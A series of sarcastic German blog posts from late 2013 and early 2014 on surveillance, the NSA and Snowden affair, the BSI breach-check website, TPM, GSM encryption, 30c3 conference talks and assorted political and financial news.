Wenn ihr übrigens mal Rüdiger Weis beim Meckern über TPM zugehört habt, werdet ihr die Einsicht mitgenommen haben, dass TPM nicht dazu da ist, den Anwender zu schützen, sondern die Software von Microsoft vor dem Anwender. Rüdi malt dann immer das Bild an die Wand, dass das Booten von Linux verhindert werden soll. TPM selbst kann das nicht, der führt immer auch unvalidierten Code aus. Aber wenn der Code fragt, ob er validiert wurde, dann kann ihm TPM sagen, ob das Windows in einer vertrauenswürdigen Umgebung hochgekommen ist oder nicht. Und da kommt dann halt bei manipulierten System (z.B. zum Linux-Booten, wenn man keinen TPM-fähigen Bootloader nimmt) "falsch" zurück als Antwort. Dieses Detail war das Feigenblatt, hinter dem sich die Trusted-Computing-Leute vor Rüdi versteckt haben. Intel hat allerdings noch mehr in ihren Prozessoren drin, das über das TPM-Zeugs hinausgeht. Da kann im Prozessor auch hinterlegt werden, dass nur als vertrauenswürdig signierter Code zur Ausführung kommen soll. Das nennt sich dann Launch Control Policy. Wenn Rüdi das hört, kriegt er einen Schlaganfall.
Update: Krass, Privatecore macht sogar explizit Werbung, dass ihr Produkt Cloudserver vor der NSA schützt. Was für eine Frechheit!
[l] Nachdem die GEMA bei Youtube auf Granit beißt, holt sie sich die Kohle jetzt halt von uns allen:
Die deutsche Gema unterstützt die Forderung, dass in einem neuen Urheberrecht das Einbetten von Youtube-Videos kostenpflichtig werden sollte.
Und weil die Politik sowas nicht macht, werden die auch bestimmt keine Einwände haben. Wahrscheinlich gibt es noch eine Expertenanhörung, bei denen die Experten dann wie üblich vollständig ignoriert werden. Ich erinnere mich noch lebhaft an meine eigene Expertenanhörung im Bundestag, als die Experten mit den Worten begrüßt wurden, es sei ja schön, dass wir wieder da sind, nachdem wir schon die letzten Male komplett ignoriert wurden. So läuft das halt im Politikgeschäft.

Tue Feb 4 2014

[l] HP findet heraus, dass die Firma Autonomy, die sie für 11 Milliarden Dollar gekauft haben, eine äußerst kreative Buchführung hatte. Die haben 80% weniger Profit und 54% weniger Umsatz gemacht als in den Büchern stand. Hups.
Da stellen sich mehrere spannende Fragen. Ist das eine übliche Größenordnung? Wieso merkt HP das erst nach der Übernahme? Wer hat da Due Diligence gemacht, CSC? :-)
[l] Die neuen Terroristen: 67jährige Krypto-Professoren aus Belgien. Der Typ hat u.a. an Payment-Systemen mitgearbeitet und ist anscheinend per Quantum Insert über eine gefälschte Linkedin-Einladung angegriffen worden (das ist das "einen Rechner vor Ort in der Nähe haben, der schneller antworten kann als das tatsächliche Ziel"-Programm der NSA). Immerhin haben sie in Belgien eine Ermittlung gestartet. Das ist ja bei uns undenkbar, dafür ist ja auch gar kein Platz im Dickdarm der USA, wo es sich unsere Behörden bequem gemacht haben.

Sun Feb 2 2014

[l] Wisst ihr, was wir lange nicht mehr gemacht haben? Schweres Militärgerät an die Saudis verkaufen! Und das wäre ja schade, wenn das nicht klappt, daher gibt es von der Bundesregierung eine Hermesbürgschaft.
Demnach will die Bundesregierung beim geplanten Export von mehr als hundert Patrouillen- und Grenzüberwachungsbooten an das Innenministerium des Golfstaats mit insgesamt rund 1,4 Milliarden Euro bürgen.
Update: Saudi-Arabien hat übrigens gerade ein neues Antiterrorgesetz erlassen.
Activists said that simply exposing corruption could be seen as a violation of the law. Some also warned that Saudi women who get behind the wheel of a car in violation of the ban on female drivers could be tried under the new anti-terror law.
So einem Land will man doch Kriegswaffen verkaufen!1!!

Fri Jan 31 2014

[l] Die erste Drohnen-assiertierte Verhaftung in den USA hat jetzt zu einer Verurteilung geführt. Die Geschichte ist echt absurd. Es geht um einen Farmer, dem sechs Kühe seines Nachbarn auf sein Land gelaufen sind. Er hat sich dann geweigert, die rauszurücken, also rief die Polizei ein SWAT-Team. Weil die sich nicht sicher waren, ob sie stürmen können, haben sie eine Predator-Drohne gerufen (nein, wirklich!), und die hat dann Luftaufnahmen gemacht und ihnen gefunkt.
Für mich klingt das alles wie der Versuch der lokalen Polizeibehörden, Ausgaben für Drohnen in der Zukunft irgendwie zu rechtfertigen. Das ist ja wohl grotesk, dass ein SWAT-Team sich nicht traut, ein Bauernhaus irgendwo in der Wildnis von North Dakota zu stürmen. Bzw dass es überhaupt ein SWAT-Team braucht, um sechs Kühe von einem Feld auf das andere zu treiben. Krass. (Danke, Karl)

Thu Jan 30 2014

[l] Endlich wissen wir, wer an der sich ständig erhöhenden Terrorgefahr in den USA Schuld ist: Edward Snowden. Wer auch sonst!
Das habe die Arbeit der Spionagebehörden "viel, viel härter" gemacht. Der Chef des Auslandsgeheimdienstes CIA, John Brennan, sagte in der Anhörung, es sei nun schwieriger, Terrorverdächtige zu finden und gegen die Bedrohungen vorzugehen.
Belege dafür, dass die Terrorgefahr hochgeht, oder dass es überhaupt eine erwähnenswerte Terrorgefahr gibt, bleiben sie natürlich schuldig. Wo kämen wir da auch hin, wenn Sicherheitsesoteriker sich an Fakten binden ließen.
Aber hey, solange dieser Clapper noch im Amt ist, müssen wir uns über die Details gar nicht weiter unterhalten. Der hat den US-Senat angelogen. Das ist eine Straftat, die mit langjährigen Haftstrafen belegt ist. Der Mann ist ein Krimineller. Der sollte im Knast sitzen, nicht in seinem Büro.

Tue Jan 28 2014

[l] Der Herr Verfassungsschutzchef Maaßen ist noch weggetretener als bisher angenommen. Der hat gleich ein ganzes Füllhorn von Kloppern zu Protokoll gegeben. Ein Knüller jagt den nächsten! Es geht gleich kräftig los mit:
Ich gehe davon aus, dass die Amerikaner sich an amerikanisches Recht halten. Und das sieht nicht vor, Industriespionage durch amerikanische Dienste zu betreiben
Ja nee, natürlich nicht, Herr Maaßen! Warum würden sie das auch tun, Herr Maaßen!
But wait, there's more!
Wir haben weder valide Erkenntnisse, dass die Amerikaner Breitbandkabel in Deutschland anzapfen, noch ob aus der US-Botschaft in Berlin das Handy der Kanzlerin abgehört worden ist
Man würde denken, mit den Argumenten sind sie schon vor Monaten gescheitert, das Interview ist bestimmt vom August oder so. Aber nein, das ist frisch.
Ich würde ja auf die Primärquelle linken, aber die haben bei mir verschissen bis in die Steinzeit.
Aber eine Sache ist ja wohl sonnenklar. Nach dieser vollumfänglichen Bankrotterklärung des Verfassungsschutzes kann niemand mehr dagegen sein, den ganzen Laden sofort zu schließen. NSA und GCHQ prahlen in Powerpoint-Folien über ihre Fähigkeiten und der Verfassungsschutz schafft es in sechs Monaten Ermittlungsarbeit nicht, irgendwas davon aufzuklären. Was haben die die ganze Zeit gemacht? V-Leute in der NSA anzuwerben versucht?! Zumachen, jetzt! (Danke, Marc)

Fri Jan 24 2014

[l] Seid ihr auch so genervt von diesen ganzen Dünnbrettbohrer-Doktorarbeiten? Stört euch das auch so, dass die Politiker alle nicht mehr zum Arbeiten kommen, weil sie sich Sorgen machen müssen, dass jemand eine Kopie ihrer Doktorarbeit liest? Keine Sorge, das ist bald vorbei: NRW hat eine innovative Lösung für das Politiker-Doktorarbeiten-Problem:
Politiker in Nordrhein-Westfalen […] haben ein neues Hochschulgesetz verfasst, das sie in Zukunft ermächtigt, Fakultäten an Universitäten das Promotionsrecht zu entziehen.
Mit anderen Worten: Wenn eine Fakultät Doktorarbeiten ehrlich bewertet und Plagiate zurückweist, dann wird sie schlicht zugemacht. Wo kommen wir da auch hin, wenn man sehen kann, was für Verlierer in der Politik arbeiten?

Thu Jan 23 2014

[l] Vor ein paar Wochen haben sie in Kalifornien ein Gesetz gemacht, dass im Bundesstaat Kalifornien der NSA weder Strom noch Wasser geliefert werden dürfen. Das war eine nette Hippie-Geste, aber die NSA hat in Kalifornien gar keine Niederlassungen.
Aber jetzt gibt es auch einen Gesetzentwurf in Washington State, und da gibt es tatsächlich eine NSA-Installation als Teil einer Militärbasis. Diese Offnow-Pressure-Group scheint auch in anderen Bundesländern an Einfluss zu gewinnen. Mal sehen, was daraus noch wird.

Wed Jan 22 2014

[l] Ich hab zu dem BSI-Ding nichts gesagt, weil da die ganzen Fakten im Verborgenen bleiben. Es gibt da eine nebulöse Webseite beim BSI, bei der man seine Email-Adresse eingeben kann, und der sagt einem dann, ob man gehackt wurde oder nicht. Das erscheint nicht nur mir sehr suspekt, es erinnert gar an den alten Witz "geben Sie hier Ihre Kreditkartennummer ein, dann sagen wir Ihnen, ob Ihre Kreditkartennummer in den Händen von irgendwelchen Leuten im Internet ist". Antwort: Ja.
Erschwerend hinzu kam, dass die Seite dann ziemlich sofort unter der Last zusammenbrach (warum eigentlich?).
Die Fakten liegen immer noch nicht auf dem Tisch, aber so langsam scheint halbwegs Konsens zu bestehen, dass da irgendein Ermittlungsverfahren gegen irgendjemanden läuft, weil sie diese Daten gefunden haben. Daher wollen sie nicht sagen, woher sie die haben.
Ich stelle mir das so vor. Das BSI wird von einer Firma oder Behörde angerufen, weil die ein Botnetz bei sich gefunden haben. Die kommen und finden beim Stochern diese Daten. Was tun? Nun könnte man natürlich die Email-Adressen alle anschreiben, aber wer glaubt denn seit dem Bundestrojaner noch Emails von Behörden?
Diese Webseite jetzt ist aus meiner Sicht Ass Covering. Da geht es nicht darum, Leuten zu helfen. Denn Leute, die sich um ihre Sicherheit genug Sorgen machen, dass sie von der Existenz so einer Webseite erfahren, und dann da hingehen und damit interagieren, sind vermutlich eh nicht betroffen. Ich verwende z.B. eine eigene Email-Adresse pro Webseite, die meine Email-Adresse haben will — und natürlich jeweils ein anderes Passwort. Soll ich die jetzt alle beim BSI eingeben? Ich mache das ursprünglich, um zu erkennen, woher Spammer Email-Adressen haben, aber es hilft natürlich auch prima gegen solche Account-Datenbanken. Da ist dann jeweils nur der eine Account gehackt, das Passwort funktioniert nirgendwo anders.
Dazu dann das Verfahren, das die das wählen. Man kriegt die Antwort nicht direkt sondern man kriegt einen Code und später eine Email, wenn man betroffen war. Wenn man nicht betroffen war, kriegt man keine Email. Das BSI scheint zu glauben, dass davon auch die Umkehrung gilt: Wer keine Email kriegt, war nicht betroffen. Aber das ist natürlich Blödsinn, Emails können verloren gehen, im Spamfolder landen, versehentlich gelöscht werden, etc. Oder wenn die Credentials gehackt waren und auch für den Email-Provider gelten, kann jemand mit den Daten natürlich auch die Email vom BSI löschen, bevor das Opfer sie sieht. Und die Email ist im Gegensatz zu der SSL-Verbindung, über die man die Daten einschickt, nicht verschlüsselt und signiert, d.h. wenn da eine Mail kommt, gibt es keinen Grund, der zu trauen. Den Code hätte auch jemand raten können. Kurz: Die Aktion ist voll für den Fuß. Das BSI tut das daher aus meiner Sicht nur, weil sie glauben, irgend etwas tun zu müssen.
Besonders absurd mutet die Meldung von heute an, dass das BSI seit Dezember auf den Daten saß, aber so lange brauchte, weil sie wirklich sicher gehen wollte, dass ihre Webseite den Ansturm aushalten würde. Was sie dann nicht tat.
Einmal mit Profis arbeiten!
Update: Die Webseite heißt übrigens www.sicherheitstest.bsi.de und liegt bei Strato. Ohne jetzt irgendwie Strato bashen zu wollen, aber … srsly, BSI? Das konntet ihr nicht selber hosten? So sieht das aus, wenn jemand per DNS-Hijacking Domains umlenkt. Übrigens liegt die BSI-Webseite nicht nur in einem anderen Netz (das dem BSI gehört), sondern sie benutzt auch eine andere Domain. Viel mehr Indizien für "hier riecht was schlecht, hier geb ich lieber keine Daten ein" hätte man auf die Schnelle gar nicht ankreuzen können. Oh, doch, eine noch. Das SSL-Zertifikat kommt bei der BSI-Homepage von Trustcenter, und beim Sicherheitstest von T-Systems. NA SUPER. Vertrauenswürdiger geht es ja kaum!1!!
Update: Anscheinend soll die Rück-Email PGP-signiert sein. Wozu brauchen sie dann den Code, wenn sie PGP haben? Weil niemand einen Grund hat, einem angeblichen BSI-Key zu vertrauen, der vor sechs Wochen erzeugt wurde?
Update: Wo wir gerade bei T-Systems waren… guckt mal, was da auskommentiert im HTML steht:
```
                          <div style="padding-top:20px;padding-bottom:20px;">
                              
```
Und hier ist das Bild. Ja, das hätte ich auch lieber auskommentiert an deren Stelle *schenkelklopf* :-)
Update: Ah, sie haben auch ihren öffentlichen PGP-Schlüssel auf ihrer HTTP-Webseite. Immerhin. Ich sehe trotzdem nicht, wieso sie da überhaupt Email machen und nicht direkt per Web antworten. Das schafft doch nur zusätzliche Metadaten.
Update: Der PGP-Schlüssel ist vom 9.12., das SSL-Zertifikat ist vom 17.12. Da kann man mit ein bisschen Fantasie die Denkprozesse verfolgen.
Hey, Cheffe, wir haben hier echt viele Email-Adressen, was machen wir jetzt?
Wir schreiben denen ne Email!
Ja, aber Cheffe, seit dem BKA-Trojaner glaubt unseren Emails doch keiner mehr!
Dann signieren wir die halt mit PGP!
OK, Cheffe, hab nen Schlüssel gemacht, aber wieso sollten die Leute dem denn vertrauen? Ich hätte Frau Merkel gebeten, uns den zu signieren, aber die hat kein PGP!
Na gut, dann machen wir dazu ne Pressemitteilung und machen einen Webserver auf und da tun wir den Schlüssel hin!
Aber Cheffe, unser Webserver hält doch nichts aus, wir benutzen doch Java!
Ja, äh, hmm, na löse das halt irgendwie!1!!
OK, Cheffe, ich hab jetzt bei Strato nen Webserver geklickt, aber wir brauchen auch SSL, sonst lachen die Leute doch wieder über uns!
Hmm, also über unseren normalen Amtsweg braucht das 4 Monate. Frag mal Strato, ob die nicht auch SSL mit verkaufen können!
OK, Cheffe, hab ich gemacht, alles in Ordnung!1!!
Update: In den Mails an Betroffene steht, dass die Daten bei einem Botnet gefunden wurden. Jemand hat mir ein Zitat aus so einer Mail geschickt.
Update: Der Code steht bei den PGP-Mails übrigens im Subject, also im nicht signierten Header-Bereich.

Sun Jan 19 2014

[l] Die Deutsche Bank hat überraschend Verlust bekannt geben müssen. Schuld sind die Kosten für Gerichtsverfahren und Restrukturierung. Der Verlust beläuft sich auf gut 1,1 Milliarden Euro, Gerichtskosten beliefen sich auf 623 Millionen und im Dezember haben sie sich auf eine Strafzahlung von 1,4 Milliarden Euro in einem Verfahren mit der US Federal Housing Finance Agency verpflichtet. Dabei ging es um Klärschlamm-Kredite, die sie zwischen 2005 und 2007 an Fannie Mae und Freddie Mac verscheuert haben. Und dann gab es da noch die 723 Millionen Euro Strafe der EU-Kommission wegen des Libor-Skandals. Mit anderen Worten: Die hätten fett Gewinn gemacht. Die Strafzahlungen sind jetzt endlich hoch genug, dass die Bankster sie wahrnehmen.

Tue Jan 14 2014

[l] Kleines Abschiedgeschenk von IM Friedrich:
Frage: Glauben Sie, dass die Kritik an Ihrer Amtsführung während der NSA-Affäre dazu beigetragen hat, dass Sie das Innenministerium abgeben mussten?
Dr. Friedrich: Nein, die NSA-Affäre hat nichts damit zu tun. Schon einmal hat die CSU in einer Großen Koalition das Innenministerium abgeben müssen: 1966 wechselte der damalige Innenminister Höcherl ins Landwirtschaftsressort. Als Innenminister hatte ich übrigens wichtigere Themen als die NSA-Affäre.
Ja, äh … was denn so? Das will auch der Interviewer wissen. Antwort:
Dr. Friedrich: Wie gehen wir mit Zuwanderung nach Deutschland um, wie kann Integration funktionieren und wie müssen unsere Sicherheitsbehörden besser zusammenarbeiten. In all diesen Fragen habe ich klare Positionen im Interesse der Bevölkerung bezogen.
Keine weiteren Fragen, Herr Landwirtschaftsminister.
Update: Wow, die haben die Webseite dichtgemacht. Da ist wohl der Zensor von der Pinkelpause zurückgekommen und hat schnell Schadensbegrenzung betrieben. Hier zitiert die "Zeit", hier das ehemalige Nachrichtenmagazin.
Update: Die haben bloß die URL geändert.

Fri Jan 10 2014

[l] Wieso ist die GSM-Verschlüsselung eigentlich so schlecht? Aftenposten schreibt, die Briten seien Schuld.
Audestad says that the British were not very interested in having a strong encryption. And after a few years, they protested against the high security level that was proposed.
They wanted a key length of 48 bit. We were very surprised. The West Germans protested because they wanted a stronger encryption to prevent spying from East Germany. The compromise was a key length of 64 bit – where the ten last bits were set to zero. The result was an effective key length of 54 bit.
Man muss rückblickend erklären, dass 128 Bit damals ok gewesen wären, aber dass es da gar keine sooo tollen Krypto-Verfahren gab. Standard war DES mit 56 Bit Schlüssellänge. Anfang der 90er kam dann IDEA dazu, das hatte immerhin 128 Bit, aber der war patentbelastet und kam daher häufig nicht in Frage. Privatmenschen haben das ignoriert und trotzdem IDEA benutzt, Firmen haben lieber Triple-DES gemacht, damit kam man dann auf 112 bzw 168 Bit Schlüssellänge. Das galt aber als "zu langsam". Insofern war die Option bei GSM nicht, ordentlich oder schlecht Krypto zu machen, sondern welche Form von schlechter Krypto man kriegen würde. Die haben ja für ihre 54 Bit auch nicht DES mit zwei Null-Bits genommen, sondern lieber was selbstgebasteltes. Damals war erst nicht klar, ob das inkompetent oder bewusst unsicher war, aber das klärte sich schnell. In den 90ern irgendwann wurde bekannt, dass die Franzosen verhindert hätten, dass da ordentlich Krypto eingebaut wird, weil sie Deutschland weiter abhören können wollten. Jedenfalls kam die Geschichte so bei mir an.
Was jetzt wahr ist, ob es die Franzosen oder die Deutschen waren — wer weiß. Ist ja auch egal. Es war jedenfalls Absicht, und es waren die Aliierten. Vermutlich waren sowohl Franzosen als auch Briten dagegen, dass da ordentliche Krypto hinkommt. :-)

Sat Jan 4 2014

[l] Hey, Fefe, warum magst du denn keine Virtualisierung? Deswegen.
Die Betreiber der Seite geben an, dass der Angriff nicht über das eigentliche Betriebssystem ihres Webservers erfolgte, sondern über den Hypervisor der Virtualisierungssoftware des Webhosters.
Virtualisierung ist eine große zusätzliche Schichte Komplexität oben drauf auf der eh schon viel zu großen Komplexität eines Betriebssystems mit seinen Anwendungen. Das schafft völlig unnötig neue Angriffsfläche. Ich vertraue keiner dieser Lösungen.
Update: Diverse VM-Apologeten weisen gerade darauf hin, dass das ein schwaches Passwort war. Ja und? Was ändert das an dem Sachverhalt, dass die über den Hypervisor aufgemacht wurden? Der ist unnötige Angriffsfläche, über die sie jemand gehackt hat.

Tue Dec 31 2013

[l] Die meisten von euch haben hoffentlich schon wahrgenommen, dass Politik im Wesentlichen nicht von den Ministern gemacht wird, sondern von den Staatssekretären. Die Minister sind eher sowas wie Maskottchen, die gelegentlich auch mal ein Dementi vortragen dürfen.
Was vielleicht nicht jeder wusste: Auf EU-Ebene ist das genau so, und die ganzen Staatssekretäre sind CDU-Maulwürfe.
Once Merkel's Europe adviser, Corsepius, 53, is secretary-general of the European Council. Some of his 3,000 staff see him as the man who cut their access to Facebook and travel websites to make them work harder. But his real power is to steer the agendas and legal advice that shape meetings of EU governments.
Laitenberger, 49, is chief-of-staff to Jose Manuel Barroso, the president of the European Commission, which oversees trade and other EU polices. And Welle, also 49, secretary-general of the elected European Parliament, is known by some as the "prince of darkness" for the influence he wields over the legislature.
Nur falls jemand Hoffnungen auf die EU setzte. (Danke, Marc)

Mon Dec 30 2013

[l] Soo, nochmal 30c3. Gestern habe ich nicht viel mitgekriegt, weil ich mit Frank noch die Folien machen musste. Der Talk am Tag 3, den man nicht verpasst haben darf, ist der über SD Memory Card Hacking. Es stellt sich nämlich raus, dass die Flash-Hersteller selbst auf so 2-Euro-SD-Cards noch einen Mikrocontroller einbauen, häufig gar einen kleinen ARM-Chip, und dass die üblicherweise von 3rd-Party-Herstellern kommen und daher generisch sein müssen, so dass man da seine eigene Software rauftun kann. Das haben die rausgefunden und es mal getan, allerdings nicht mit einem ARM sondern mit einem Chinaplaste-Chip von "Appotech" oder so. Ausgesprochen abgefahrener Vortrag!
Der Assange-Talk fiel weitgehend aus, weil fiese Saboteure ständig strategisch über Kabel stolperten und den Feed unterbrachen. Nicht nur den Feed zu Assange, sondern auch die Streams aus dem Saal, man konnte also nicht mal einen Stream sehen, wie Assange wegbrach. Die paar Sekunden, die die Verbindung stand, musste er sich dann vergleichsweise fiese Fragen stellen lassen. Aus meiner Sicht war dieser Ausgang eine Win-Win-Win-Situation. Sehr schön war auch, dass Sarah Harrison als Rednerin gewonnen werden konnte, was die zu sagen hatte fand ich eh interessanter als Julians Phrasen. Das war nämlich auffällig, dass er da genauso gebügelte PR-Phrasen raushaute wie man sonst von Politikern kriegt, ala "robust and meaningful action" und so. Furchtbar.
Den FX-Talk werde ich mir auf Video angucken, da haben wir nochmal Tippfehler in den Folien korrigiert und nochmal das Präsentationsnotebook durchgebootet (Apple, wissenschon).
Den Fnord-Jahresrückblick haben wir auch direkt für einen kleinen Fnord genutzt, indem wir das Publikum zu einem Simultan-Facepalm animierten, um das mal als Foto für sich zukünftig bietende Gelegenheiten da zu haben. Ich hörte, auch Saal 2 soll voll gewesen sein. Ob die da auch fazialpalmiert haben, weiß ich nicht. Wenn das so war und jemand ein Foto gemacht hat, bitte ich um Zusendung per Email.
Weil das das 10jährige Jubiläum war, hatten sich diverse Gruppierungen einige Fnords am Rande ausgedacht, u.a. trugen da zwei starke Männer ein blaues Fass auf die Bühne, mit dem Schild "Strategische Popcorn-Reserven". Dann gab es da noch ein trojanisches Pony mit bizarren Verschwörungsunterlagen (wenn ich das richtig verstanden habe, dann war das eine Sammlung aus Crackpot-Post, die bei Erfakreisen so im Briefkasten aufschlugen, hauptsächlich über 9/11). Außerdem gab es da noch eine Industrie-Tröte, deren Losgehen Frank durch beherztes Ziehen der Akkus verhindern konnte. Nachdem wir eh schon eine Stunde später als sonst lagen, und dann eine viertel Stunde verzögert wurden, weil FX überzogen hat, haben diese Einlagen leider noch eine halbe Stunde Verzögerung verursacht und Frank und mich aus dem Flow abgebracht. Das ist für das Publikum vielleicht nicht so offensichtlich, aber wir verbringen jedes Jahr Monate mit Sammeln, Aussieben, dem Finden von Geschichten und guten Illustrationen zu selbigen, und dem Aufbau eines Spannungsbogens. Da ist das dann schon schade, wenn der dann so zersägt wird. Gegen Ende merkte man ein bisschen, dass dem Publikum die Luft ausging, und das war halt vermeidbar. Ich denke mal, nächstes Jahr ist kein Jubiläum, da machen wir dann keine Unterbrechungen mehr während der Show, dann flutscht das noch besser. So war das nicht nur der späteste sondern auch der längste Fnord-Jahresrückblick.
Am nächsten Morgen gab es noch einen sehr empfehlenswerten Vortrag, der erste in Saal 1, Hacking the Czech Parliament via SMS. Die haben sich die Telefonnummern der Parlamentarier besorgt und dann auf eine Gelegenheit gewartet. Die kam, als ein Minister wegen Korruption verhaftet wurde und im Parlament bei einer Spezialanhörung Rede und Antwort stehen musste. Das wurde live übertragen und viele Menschen guckten zu. Die Vortragenden haben dann ein Drama aus Fake-SMSsen verschickt, die so aussahen, als schickten die die sich untereinander. Während also vorne ein Politiker steht und sich wegen Korruption verteidigen will, gehen hinten Botschaften per SMS herum wie "Das geht so nicht weiter, wir müssen hier mal wirklich was ändern, diese Korruption muss weg". Das Highlight war, dass der Premierminister dann der Presse sagte, ihm sei ja sofort klar gewesen, dass das Fake-SMSsen waren, weil die eine von seinem Finanzminister kam, und das sei ja offensichtlich, dass der niemals Reform vorschlagen würde :-)

Sun Dec 22 2013

[l] Das Narrativ der Amerikaner, wieso CIA und NSA nicht abgeschafft werden können, nimmt Gestalt an. Die CIA hat mit Hilfe der NSA der aufrechten kolumbianischen Regierung geholfen, die fiesen FARC-Rebellen abzumurksen!1!!
Die CIA hat natürlich den Wetwork-Teil übernommen ("covert action program"), und die NSA hat halt gemacht, was sie immer macht:
The secret assistance, which also includes substantial eavesdropping help from the National Security Agency, is funded through a multibillion-dollar black budget.

Fri Dec 20 2013

[l] Die Daily Show hat eine wunderschöne Geschichte ausgegraben. Einer der für den Klimawandel zuständigen Bosse bei der US-Umweltbehörde EPA hat sich jahrelang sein Gehalt auszahlen lassen, ohne zur Arbeit zu erschienen. Wie hat er das gemacht? Er hat denen erzählt, er sei Undercover-Agent bei der CIA und müsste nach Afghanistan fliegen, um die Taliban zu bekämpfen. Dieser ganze Clip ist so großartig, das ist absolut unfassbar.

Thu Dec 19 2013

[l] Die Fed will pro Monat 10 Milliarden Dollar weniger an US-Staatsanleihen kaufen. Dass die das überhaupt machen, ist echt ein Kracher. Das heißt im Wesentlichen, dass der Staat Schulden macht, und die Zentralbank dann mit frisch gedrucktem Geld die Schulden kauft. Das machen die seit einer Weile. Letztlich heißt das, dass die Zentralbank Geld erfindet, mit dem der Staat dann Dinge bezahlt, für die er kein Geld hat. Und weil die Zentralbank auf dem Papier unabhängig ist, und ihre Profite dem Finanzministerium gibt, und sie selbst keine Kosten für das Generieren dieses Geldes hat, kann sie das dem Staat ohne Zinsen leihen, oder mit sehr geringen Zinsen. Eine Luftnummer, egal aus welchem Winkel man drauf guckt.
Der Punkt ist, dass die US-Regierung schon länger ihr Budget nicht im Griff hat, wie auch die meisten anderen westlichen Regierungen. Wenn denen niemand das Geld leiht, mit dem sie dann ihre Dinge bezahlen, dann platzt das ganze System. Umso erstaunlicher, dass die Fed jetzt weniger Geld zur Verfügung stellen will. Dann muss entweder der Staat mehr sparen, oder sie müssen einen anderen Verleiher finden, und der würde vermutlich mehr Zinsen sehen wollen. Das klingt nach einem Desaster.
Dazu kommt, dass China neulich angekündigt hat, keine Dollars mehr zu kaufen. Vielleicht ist das die Reaktion darauf. Wenn China die nicht kauft, dann gäbe es ja sonst ein Überangebot. Hat China jeden Monat 10 Milliarden Dollar gekauft?
Update: Diese Ausführung sind ein wenig konfus, weil die Lage konfus ist. Ich verstehe jedenfalls nicht, wie das zusammenpasst. China war lange Jahre der größte Käufer von US-Staatsanleihen, und als sie und Japan das zurückgefahren haben, ist halt die Fed eingesprungen. Jetzt sagt China an, dass sie gar keinen Bock mehr haben. Da hätte laut meinem Verständnis die Fed sagen müssen: OK, "kaufen" wir halt die Differenz auch noch. Tun sie aber nicht.
Einige stören sich auch daran, dass China von Dollarreserven spricht, diese Meldung hier aber um Staatsanleihen geht. Das ist, was China mit ihren Dollars immer gemacht hat. Staatsanleihen kaufen. D.h.: Das Geld den Amis zurück verleihen. Die sind damit wieder in China einkaufen gegangen.
Update: Die Chinesen haben wirklich pro Monat 10 Milliarden Dollar Schulden gekauft. Juli 2010: 843 Milliarden Dollar, August 2013: 1,268 Billionen Dollar. Differenz: 425 Milliarden auf 36 Monate, d.h. 11,8 Milliarden pro Monat. Wow.

Tue Dec 17 2013

[l] Die neuen Terroristen: Comiczeichner und -texter. Für ein T-Shirt mit der Aufschrift "Südanflug". In der Buchhaltung der Bank hat deren ranzige IT aus dem ü ein u gemacht, weil es keine Umlaute konnte, und dann war das plötzlich ein Sudanflug und das triggerte die Terroristen-Erkenn-Software. (Danke, Anton)

Sun Dec 15 2013

[l] Fnord des Tages: Lufthansa hat in Schweden eine bizarre Werbekampagne gefahren. Sie haben gesagt: Wenn du deinen Namen legal zu Klaus-Heidi änderst, dann kannst du an einem Preisausschreiben teilnehmen. Der Gewinner fliegt kostenlos nach Berlin und kriegt in Kreuzberg eine Wohnung von Lufthansa, für ein Jahr bezahlt. Die Punchline: 42 Schweden haben das gemacht. Lolwut!?
[l] Die Amis wissen immer noch nicht, was der Snowden da jetzt eigentlich alles hat mitgehen lassen.
Meine Theorie dazu: Die Aufsichtsgremien haben in einem seltenen Moment des Aufsichswillens vorsichtig angefragt, ob die NSA weiß, was da alles weggekommen ist. Die NSA hat eine Liste gemacht, un sich gedacht: Hmm, von dem hier wissen die noch nichts, das hier wäre peinlich, das hier haben wir auch bisher vor denen verschwiegen … wenn wir jetzt die Liste rüberrücken, dann räumen wir damit ohne Not ein, diese ganzen fiesen Dinge zu tun. Diese Aufsichtsgremien sind ja wie bei uns der Friedrich. Die brauchen plausible deniability. Die müssen sagen können: Davon höre ich zum ersten Mal!11! Und das muss man ihnen abnehmen. Daher sagen die Dienste denen nichts, und die fragen bei den Diensten auch nicht nach. So kann man das im Notfall auf ein Kommunikationsproblem schieben, alle Seiten sind entrüstet und entsetzt, dass es soweit kommen konnte, und niemand muss seinen Hut nehmen.
Vor der Wahl, ob sie die jetzt erstmal informieren, was sie alles für gruselige Black Ops machen, oder ob sie lieber wie inkompetente Idioten dastehen, haben sich die NSA-Entscheider halt für Letzteres entschieden.

Fri Dec 13 2013

[l] Chinas Zentralbank hat angesagt, dass sie keinen Vorteil mehr darin sehen, ausländische Währung zu kaufen. Das haben sie bisher immer gemacht, damit ihre eigene Währung im Vergleich zu Dollar und Euro billig bleibt und ihre Waren dann in den USA und Europa nicht zu teuer werden. Das ist eine sehr bedeutende Ansage, wenn sie jetzt den Yuan nicht mehr künstlich billig halten wollen. Das würde massive Auswirkungen auf den Welthandel haben, wenn sie da wirklich die Zügel aus der Hand geben.
Deren Problem ist halt, dass sie da immense Berge an ausländischem Geld aufgebaut haben. Und weil der Westen aus Wirtschafts-Stimulus-Gründen seine Leitzinsen gesenkt hat, kriegen sie dafür auch kaum noch Zinserträge.
[l] Gute Nachrichten: Die Bundeswehr hat ihre unbemannte Unterwasser-Aufklärungsdrohne wieder gefunden, die sich vor vier Monaten (!) selbständig gemacht hatte. (Danke, Florentin)
[l] Übrigens, weil ich hier Ghostery schon mal verlinkt hatte: Es gibt das auch in verallgemeinert. Allerdings nur für Firefox. Da sind dann alle Cross-Domain-Zugriffe grundsätzlich zustimmungspflichtig. Man kann temporär oder permanent zustimmen, und die Zustimmung ist pro Quell- und Zieldomain.
Das fängt auf der einen Seite alle mögliche Werbung, Webwanzen und andere Schweinereien, aber es bricht auch diverse schlecht gemachte Sites.
So hat es sich z.B. eingebürgert, seine statischen Bilder auf einer zweiten Domain abzulegen. yahoo.com legt seine Bilder z.B. auf yimg.com ab. Die Idee dahinter ist, dass die dynamischen Frameworks von yahoo.com ein Dutzend Cookies setzen, und die würden dann alle bei jedem HTTP-Request mitübertragen, auch für die eingeblendeten Bilder, für die sie gar keine Rolle spielen und nur Platz verplempern.
